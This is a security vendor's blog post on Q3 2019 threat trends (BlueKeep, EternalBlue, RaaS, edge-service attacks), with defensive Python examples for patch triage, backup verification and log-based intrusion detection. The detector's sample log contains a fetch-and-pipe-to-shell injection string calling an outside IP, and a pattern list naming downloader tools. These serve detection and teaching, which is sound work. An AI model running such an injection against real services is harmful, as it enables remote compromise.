How Partners Can Leverage Threat Intelligence to Better Protect Customers

By Anthony Giandomenico | December 30, 2019

As customers continue to expand their service offerings to stay competitive in the growing digital economy, partners must gather and use up-to-date threat intelligence to protect them from potential risk. Analyzing this information is the key for partner security teams to build sophisticated security strategies that address the evolving cyber risks their customers face. This not only allows partners to effectively manage today’s threats, but also enables them to offer comprehensive security solutions in the future.

When monitoring threat activity, it’s important for partners to examine relevant trends within the cyber landscape, enabling them to better identify the risks these threats pose to customer security. With that in mind, the Q3 Fortinet Threat Landscape Report identified several prevalent threats that partners should be monitoring and incorporating into their security solutions and strategies.

BlueKeep and EternalBlue Vulnerabilities Continue to be Exploited

The BlueKeep vulnerability (CVE-2019-0708, in Windows Remote Desktop Services) continued to pose a significant threat over the past quarter, as it has for many months now. Similarly, attackers continued to target systems still exposed to the EternalBlue exploit, which abuses a flaw in SMBv1 that Microsoft patched in March 2017 (MS17-010). Like BlueKeep, it is an unauthenticated remote code execution vulnerability: an attacker who can reach the service over the network can take complete control of the system and run code of their choice on it. That combination of remote reach and no credentials required is what makes both so attractive to criminals delivering malware into business networks, and why partners should treat them as a priority.

The continued threat activity surrounding BlueKeep and EternalBlue underlines the importance of patching known vulnerabilities. In Q3 of 2019, there were more exploit attempts against vulnerabilities from 2007 than against those from 2018 and 2019 combined; attackers keep hitting old bugs because old bugs keep working. Partners should therefore work with customers to review their cyber hygiene, prioritize patching by what is actually being exploited rather than by how recent a CVE is, and automate the patching and upgrading of vulnerable devices wherever possible, no matter how old they are. Of course, patching or replacing devices is often easier said than done. Some are embedded in 24/7 installations that simply cannot be taken offline. In such cases, organizations may need help designing and implementing compensating controls placed close to the device, such as network segmentation, inline IPS signatures that act as a virtual patch, and zero-trust access, so that an existing or future vulnerability cannot be reached or exploited even though it remains unpatched.
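As an added worked example (not code from the original post or from Fortinet), the following Python script sketches the prioritization described above: findings are ranked by in-the-wild exploitation first, then by internet exposure, then by age with older bugs first, and devices flagged as unpatchable are routed to compensating controls instead of being dropped from the list. The inventory, the ACTIVELY_EXPLOITED set and the placeholder identifiers CVE-2007-0000 and CVE-2018-0000 are constructed; the two real identifiers are BlueKeep (CVE-2019-0708) and the SMBv1 flaw behind EternalBlue (CVE-2017-0144).

```python
"""Prioritise patching by what is being exploited rather than by CVE age, and
route devices that cannot be patched to compensating controls.

Added illustration for this post; not FortiGuard or Fortinet code. The inventory
below is constructed sample data, and ACTIVELY_EXPLOITED is an assumption standing
in for whatever threat-intelligence feed a partner actually consumes."""

from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    cve: str
    service: str            # "rdp", "smb", "http", ...
    internet_exposed: bool  # reachable from outside the customer's network
    can_patch: bool         # False for 24/7 embedded gear that cannot be taken offline


# Constructed: CVEs the intel feed reports as exploited in the wild this quarter.
# CVE-2019-0708 is BlueKeep; CVE-2017-0144 is the SMBv1 bug behind EternalBlue.
ACTIVELY_EXPLOITED = {"CVE-2019-0708", "CVE-2017-0144"}


def cve_year(cve: str) -> int:
    return int(cve.split("-")[1])


def priority(f: Finding) -> tuple:
    """Sort key, larger is more urgent: exploited in the wild first, then internet
    exposure, then older CVEs first (attackers keep hitting old bugs, so age is
    not a reason to defer)."""
    return (f.cve in ACTIVELY_EXPLOITED, f.internet_exposed, -cve_year(f.cve))


def compensating_controls(f: Finding) -> list[str]:
    """Controls placed close to an unpatchable device so the flaw cannot be reached."""
    controls = [
        "segment the device into its own zone with default-deny egress",
        "front the service with zero-trust access; no direct internet exposure",
    ]
    if f.service == "rdp":
        controls.append("require Network Level Authentication and restrict 3389 to a jump host")
    elif f.service == "smb":
        controls.append("disable SMBv1 and block 445 at the segment boundary")
    controls.append(f"enable the inline IPS signature for {f.cve} as a virtual patch")
    return controls


def triage(findings: list[Finding]) -> dict:
    """Return the patch order for patchable hosts and a control plan for the rest."""
    ordered = sorted(findings, key=priority, reverse=True)
    patch = [f for f in ordered if f.can_patch]
    compensate = {f.host: compensating_controls(f) for f in ordered if not f.can_patch}
    return {"patch_order": [(f.host, f.cve) for f in patch], "compensate": compensate}


# Constructed inventory. CVE-2007-0000 and CVE-2018-0000 are placeholders, not real CVEs.
INVENTORY = [
    Finding("fileserver01", "CVE-2017-0144", "smb", internet_exposed=False, can_patch=True),
    Finding("kiosk-plc-03", "CVE-2019-0708", "rdp", internet_exposed=True, can_patch=False),
    Finding("legacy-cam-07", "CVE-2007-0000", "http", internet_exposed=True, can_patch=False),
    Finding("hr-web", "CVE-2018-0000", "http", internet_exposed=True, can_patch=True),
    Finding("intranet-wiki", "CVE-2019-0708", "rdp", internet_exposed=False, can_patch=True),
]

if __name__ == "__main__":
    plan = triage(INVENTORY)
    for host, cve in plan["patch_order"]:
        print(f"PATCH      {host:14} {cve}")
    for host, controls in plan["compensate"].items():
        print(f"COMPENSATE {host:14} " + "; ".join(controls))
```

Note that the 2007 placeholder outranks the 2018 one even though both are internet-exposed and neither is in the exploited set: the sort deliberately refuses to treat age as a reason to defer, which is the lesson of the Q3 numbers.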

Ransomware-as-a-Service is Gaining Ground

Over the past few years, cyber criminals have used Ransomware-as-a-Service (RaaS) to facilitate attacks and increase revenue. What makes this model particularly dangerous is that it lets criminals carry out large-scale targeted attacks with relative ease and little technical skill of their own, which is why it continues to grow. In Q3, for example, the FortiGuard Labs team observed two ransomware families moving to a RaaS model: Sodinokibi and Nemty. Both have been used against large organizations, and their new service model means customers are likely to see a spike in such activity over the next year or so.

The rapid growth of both Sodinokibi and Nemty demonstrates the clear danger ransomware poses to enterprise organizations. Their financial success will not only encourage more criminals to buy into RaaS offerings but will also push more malware developers to adopt the model themselves.

This brings up an important point about mitigating ransomware risk. Defending against RaaS requires partners to take a proactive approach that goes beyond identifying and blocking the ransomware families currently in circulation. It means continually evaluating emerging trends to determine the risk they pose and what must be done to prevent current and future attacks. It also means guiding customers through a complete ransomware strategy: enhanced security controls combined with practical measures such as regularly backing up systems, keeping backups off-network together with the hardware and software needed to recover, and regularly running recovery drills so that the backups are known to restore cleanly before they are needed and downtime after an attack is kept to a minimum.
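The recovery drill above can be made concrete. The following Python script is an added example (not from the original post or from Fortinet) of the check a drill should perform: a hash manifest is written when the backup is taken and stored with the off-network copy, and a restore is then compared against it, so files that ransomware rewrote, deleted or dropped are surfaced rather than discovered during a real incident. The backup contents are constructed in a temporary directory so the script runs offline.

```python
"""Recovery drill: restore a backup and check it against the manifest recorded when the
backup was taken. Ransomware that reaches a backup rewrites or deletes files, so hash
mismatches and missing files are exactly what the drill must surface.

Added example for this post, not from the original. It builds its sample backup from
constructed files in a temporary directory so it runs offline."""

import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict[str, str]:
    """Relative path -> SHA-256, computed at backup time. Store it with the off-network
    copy (and preferably sign it) so a compromised host cannot rewrite it to match
    tampered data."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(restored: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """Compare a restored tree with the manifest; three empty lists mean the drill passed."""
    present = build_manifest(restored)
    return {
        "missing": sorted(k for k in manifest if k not in present),
        "modified": sorted(k for k in manifest if k in present and present[k] != manifest[k]),
        "unexpected": sorted(k for k in present if k not in manifest),
    }


def run_drill(tamper: bool = True) -> dict[str, list[str]]:
    """Back up constructed data, restore it, optionally simulate ransomware touching
    the restored copy, and return the verification report."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp, "backup")
        (src / "config").mkdir(parents=True)
        (src / "db.sql").write_bytes(b"CREATE TABLE accounts (id INT);\n")  # constructed
        (src / "config" / "app.yaml").write_text("debug: false\n")          # constructed
        manifest = build_manifest(src)  # this is what ships with the offline copy

        restored = Path(tmp, "restored")
        shutil.copytree(src, restored)
        if tamper:
            (restored / "db.sql").write_bytes(b"\x00encrypted\x00")  # contents rewritten
            (restored / "config" / "app.yaml").unlink()              # file removed
            (restored / "README_DECRYPT.txt").write_text("pay up\n")  # ransom note dropped
        return verify_restore(restored, manifest)


if __name__ == "__main__":
    print("clean restore :", run_drill(tamper=False))
    print("tampered copy :", run_drill())
```

The manifest is only useful if the attacker cannot rewrite it along with the data, which is the practical argument for keeping it, and the backup, off the network the ransomware can reach.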

Cybercriminals Are Targeting Edge Services

Because over 90% of malware is still delivered via email, many organizations have responded by aggressively training users to recognize phishing emails and to avoid opening unexpected attachments, and they are more aware of the importance of email security solutions. As a result, criminals have shifted some of their effort to other parts of the attack surface that receive less attention.

For example, over the past quarter FortiGuard Labs observed attacks targeting publicly reachable edge services with remote code execution exploits. Once criminals establish a foothold on an edge device, they use it to deliver malware to targets inside the network, with the same end result as if phishing had been used to deliver those payloads.

This particular vector is not new, but the shift in attacker focus toward it is noteworthy.
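One place this shift shows up is in the access logs of the edge service itself. As an added example (not from the original post, not FortiGuard code, and not tied to any specific product or CVE), the Python script below scans constructed Common Log Format lines for the generic signs of a remote code execution attempt, namely shell metacharacters, payload downloaders, pipe-to-shell and path traversal in the request line, and records whether the server answered 2xx, which is the point at which a foothold becomes likely. The log lines and indicator patterns are constructed for the example.

```python
"""Scan an edge service's access log for requests that look like remote-code-execution
attempts (command injection, fetch-and-execute stagers, traversal) and note whether the
server answered 2xx, the point at which a foothold at the edge becomes likely.

Added example for this post, not FortiGuard code. The log lines are constructed and the
indicator patterns are generic, not tied to any specific product or CVE."""

import re
from typing import Optional
from urllib.parse import unquote_plus

# Common Log Format as written by most HTTP front ends.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Generic markers of injected shell syntax or payload retrieval in a request line.
INDICATORS = [
    ("shell_meta", re.compile(r"[;|`]|\$\(|\$\{")),
    ("downloader", re.compile(r"\b(?:wget|curl|tftp|certutil|powershell)\b", re.I)),
    ("pipe_to_shell", re.compile(r"\|\s*(?:sh|bash)\b")),
    ("traversal", re.compile(r"(?:\.\./){2,}")),
]


def parse(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def indicators(path: str) -> tuple[list[str], str]:
    """Decode twice so double-encoded payloads (%253B -> %3B -> ;) are inspected the way
    the target would see them, then return the names of the indicators that match."""
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in INDICATORS if rx.search(decoded)], decoded


def detect(lines) -> list[dict]:
    """Return one alert per suspicious request, in log order."""
    alerts = []
    for line in lines:
        entry = parse(line)
        if entry is None:
            continue
        hits, decoded = indicators(entry["path"])
        if hits:
            alerts.append({
                "ip": entry["ip"],
                "time": entry["ts"],
                "path": decoded,
                "hits": hits,
                "status": int(entry["status"]),
                # A 2xx on an injected request is the strongest sign the attempt worked.
                "succeeded": entry["status"].startswith("2"),
            })
    return alerts


# Constructed sample log: a benign login, a bare probe, a successful fetch-and-execute,
# a cached static asset, and a failed traversal attempt.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Aug/2019:10:01:02 +0000] "GET /login HTTP/1.1" 200 512
203.0.113.10 - - [12/Aug/2019:10:01:07 +0000] "POST /cgi-bin/admin?cmd=id HTTP/1.1" 200 88
203.0.113.10 - - [12/Aug/2019:10:01:09 +0000] "GET /cgi-bin/admin?cmd=%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%7Csh HTTP/1.1" 200 0
198.51.100.22 - - [12/Aug/2019:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 304 -
198.51.100.22 - - [12/Aug/2019:10:02:05 +0000] "GET /..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 162
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Two points worth noticing. The successful request from 203.0.113.10 is the one that warrants an immediate look at what that device did next on the internal network, because the foothold described above starts there. And the bare `cmd=id` probe on the line before it produces no alert: generic syntax matching catches stagers, not every abuse of a management endpoint, so in practice it is paired with per-endpoint allowlists and the vendor's own signatures.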

Final Thoughts

Q3 of 2019 saw a large number of cyber criminals exploiting system vulnerabilities, especially older ones, to gain access to critical infrastructure and launch attacks. Partners must work closely with customers on vulnerability management, since it directly determines how effective the security solutions they implement will be. Moreover, keeping customers informed of the latest threat trends plays a major role in the quality of service partners can offer and in the overall security of customers, and it further establishes the partner as a critical member of the customer's security team.

Read more about the latest cybersecurity threat trends and the rapidly evolving threat landscape in our latest Quarterly Threat Landscape Report.